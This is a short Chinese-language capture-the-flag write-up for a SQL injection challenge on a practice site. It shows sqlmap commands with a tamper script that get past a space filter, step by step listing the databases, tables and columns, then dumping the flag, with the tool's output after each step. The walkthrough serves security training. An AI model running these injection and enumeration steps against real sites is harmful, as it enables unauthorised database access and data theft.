不好意思，经过了前面两题

冲上来就是干

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tamper space2comment --dbs

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

available databases [3]:

[*] information_schema

[*] test

[*] web1

你没看错，就这么跑出来了

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tamper space2comment -D web1 --tables

Database: web1

[2 tables]

+-------+

| flag  |

| web_1 |

+-------+

接下来的动作都差不多了

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tamper space2comment -D web1 -T flag --columns

Database: web1

Table: flag

[2 columns]

+--------+----------+

| Column | Type    |

+--------+----------+

| flag  | char(30) |

| id    | int(4)  |

+--------+----------+

是不是感觉不用动脑子就好了。。。

这就是结果

Database: web1

Table: flag

[1 entry]

+----------------------------+

| flag                      |

+----------------------------+

| flag{Y0u_@r3_5O_dAmn_90Od} |

+----------------------------+

实验吧的三道题用同一个表有点懒啊